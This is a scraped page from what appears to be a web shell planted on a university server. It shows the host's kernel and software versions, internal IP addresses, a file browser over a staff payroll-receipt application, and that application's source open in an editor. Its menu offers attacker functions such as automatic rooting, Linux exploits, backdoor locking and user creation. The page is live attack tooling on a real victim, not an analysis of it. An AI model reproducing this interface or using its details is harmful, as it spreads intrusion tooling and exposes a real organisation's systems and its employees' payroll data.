Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
opt /
lampp /
htdocs /
recibos res /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxrwxr-x
ftp
[ DIR ]
drwxrwxr-x
img
[ DIR ]
drwxrwxr-x
js
[ DIR ]
drwxrwxr-x
leerpdf
[ DIR ]
drwxrwxr-x
pdf
[ DIR ]
drwxrwxr-x
recibos
[ DIR ]
drwxrwxr-x
subir
[ DIR ]
drwxrwxr-x
admin.php
38
B
-rwxrwxr-x
buscar.php
1.92
KB
-rwxrwxr-x
cabecera.php
973
B
-rwxrwxr-x
conexion.php
220
B
-rwxrwxr-x
funciones.php
1.79
KB
-rwxrwxr-x
index.php
378
B
-rwxrwxr-x
login.php
3
KB
-rwxrwxr-x
respaldofunciones.php
2.49
KB
-rwxrwxr-x
sample.html
604.89
KB
-rwxrwxr-x
sample.pdf
563.46
KB
-rwxrwxr-x
super.php
38
B
-rwxrwxr-x
usuario.php
1.79
KB
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : usuario.php
<?php include "cabecera.php"; ?> <!DOCTYPE html> <html lang="es"> <meta charset="UTF-8"> <!--<meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">--> <style> .cabecera{ padding: 10px; } .cabecera img{ height:25px; float: right; margin-top: 4px; margin-right: 7px; } .formulario{ margin-top: 5px; background-color:#007bff; padding: 20px; color: white; border-radius: 5px; } </style> <div class="container-fluid"> <div class="row cabecera"> <div class="col-lg-12"> <h1>Bienvenido/a: <a href="login.php?logout=0"><img src="img/cerrar2.png" alt="Cerrar sesión"></a></h1> </div> <div class="col-xl-12"> <h3><?php echo $_SESSION["nombre"]; ?> </h3> </div> </div> <div class="row datos"> <div class="col-md-12"> <form class="formulario" action=""> <h4>Buscar recibo de nómina:</h4> <h4>Año:</h4><input type="text" name="anio" class="form-control" id="anio" > <h4>Quincena:</h4><input type="text" name="quincena" class="form-control" id="quincena"> <input type="hidden" name="" id="rfc" value="<?php echo $_SESSION['usuario']?>"> <br> <!-- <input type="submit" value="Buscar" class="btn btn-success"> <input type="submit" value="Cancelar" class="btn btn-danger"> --> </form> </div> </div> </div> <div class="container-fluid"> <div id="datos"></div> </div> <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script> <script src="js/main.js"></script>
Close